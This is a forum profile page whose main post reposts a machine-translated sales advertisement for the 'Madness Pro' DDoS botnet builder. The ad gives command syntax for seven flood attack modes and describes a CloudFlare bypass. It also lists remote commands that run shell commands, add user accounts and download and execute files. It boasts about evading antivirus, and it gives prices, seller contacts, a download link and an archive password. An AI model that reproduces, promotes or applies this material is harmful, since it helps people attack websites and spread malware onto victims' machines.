Jump to content

lindic

Members
  • Posts

    3
  • Joined

  • Last visited

About lindic

  • Birthday 01/01/1990

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

lindic's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Vai de plm, nu ti se pare cam ilogica fraza asta ?
  2. @djxpaul Ai jabber/icq ?
  3. ------------------------------------------------------------------------------------------------------------------------------ Madness Pro DDoS Bot v1.13 Builder by NoNh ------------------------------------------------------------------------------------------------------------------------------ Translated by google ------------------------------------------------------------------------------------------------------------------------------ Madness PRO History : In the summer of 2012 we started thinking about creating a fundamentally new DDoS bot to test their own web resources on the fault-tolerance, since none of the systems tested did not deserve to even estimate "4". The test samples during devoured memory load on the CPU local machine flew with errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing activation of protective systems , many weighty error was found in the control panels. To create your own system, we have studied in detail : BlackEnergy ( source code ), gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code, purchased under the contract ), iBot ( source code , purchased under the contract ), w3Bot ( source) , were also studied the source code of Zeus and many other programs. capabilities - Written in C + +, easily crypt is lightweight (compressed sample < 15KB ) - Full compatibility with all Windows family of NT (x86 and x64) - Boat has 7 types of attacks - Stability in the system. Indicators load on the CPU and RAM are very uniform . - Do not attracted the attention of UAC and Windows Firewall - Able to establish port, referal and cookies individually for each goal - Supports up to 10 targets simultaneously - Has a very low load on the CPU with the new , complex system of parsing commands (all analogs parsing takes place inside a function in multiple threads - it's extra work load on the processor . New bot enters all data in the array before the attack on the function and come ready options address, port , referral , etc.) - Has an enormous power output of more than 1500 http ( and more 30000 UDP) queries per minute through direct interaction with the network drivers , even on desktop Windows! (only using WinSock) is about 10 times more than some few analogs and more top ( on this parameter ) competitors. - In the control panel are : the number of requests per minute , right in the system, the version of the system. - Supports bypass CloudFlare protection ( !) And many other more common. - Supports Slow GET and Slow POST modes ! - In the packet header specifies disabling the cache (Cache-Control: no-cache), which increases the load on the server . - The protection of dialogue bot panel spetsklyuchem Detection: checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32, DrWeb, Avast missed a file in 100 % of cases. Modes of attack and the team Since the system is a professional syntax commands that look like Darkness. dd1 basic mode of operation via HTTP protocol using GET, using sokkety. Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;"). The fastest search volume attack. Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2 dd2 same treatment as dd1, only the method POST. Added optional parameter @ @ @ post_data. It is also support for up to 10 targets. Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh dd3 attack on the HTTP GET method using a system library WinInet.dll. Good old attack that is used in many Delphi bots . Slow due to the limitations of Microsoft Windows. Does not support referral and cookies , supports up to 10 targets. Example : dd3 = http://host.com/script.php dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example: dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh dd5 ICMP attack ( pings ) . Supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1 dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text. Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text dd7 attack on the HTTP GET method using a system library URMON.dll Average speed attack that supports up to 10 targets and do not support cookies and referal cfa command to bypass the protection CloudFlare (!). ONLY used during dd7. Not ostavnavlivaet the command dd7. The point is simple The bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7. Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php cmd command is executed on the command interpreter cmd.exe on the local machine. Does not stop the execution of other commands. Example : cmd = net user goodwin / add exe command to load and run the EXE file. Does not stop the execution of other commands. The file is saved under the same name, under which he had been on the internet. Made three attempts to download the file. Example : exe = http://site.com/filename.exe Control Panel : We used a 70% modified of another product (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy ! Prices: - Test License $ 0 ( only for checking the forums and testers. Updates are not provided ) - Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later) - $ 950 full license ( all upgrades, rebuilds and modules are free) Protection bypass CloudFlare. CloudFlare security complex is based on the determination of the browser by running Java script in it, after which the client is issued a unique cookies. Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount of mathematical functions in the modest size of the build bot , however, some instances of coping with the task ! Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08: 1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon. As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security . 2) A botnet command is given cga = http://server.com cookies and bots request for authorization. Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header. According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it! Q) Why can not I do it automatically? A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again. So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds. Q) Can I use this method all the time, for any purpose ? A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is increased due to the preparation of the special package to bypass the protection . News of the project From today, we are working with another Celler Sales: iSupport (709186) ICQ: 902300, 903400, 709186 JAB: damrai13@jabber.ru ------------------------------------------------------------------------------------------------------------------------------ Note : inc\config.php has to be writeable Note 2 : Panel is modded Darkness (Optima) by myself (no RU language), if you have original one for madness please send it over ... ------------------------------------------------------------------------------------------------------------------------------ Download : here Password : TrojanForge.co RAR MD5 : 59F2BE414251F898D14FECC46827AD0B Builder MD5 : AE9F83A4E03D6D8977FD56744C1988DD
×
×
  • Create New...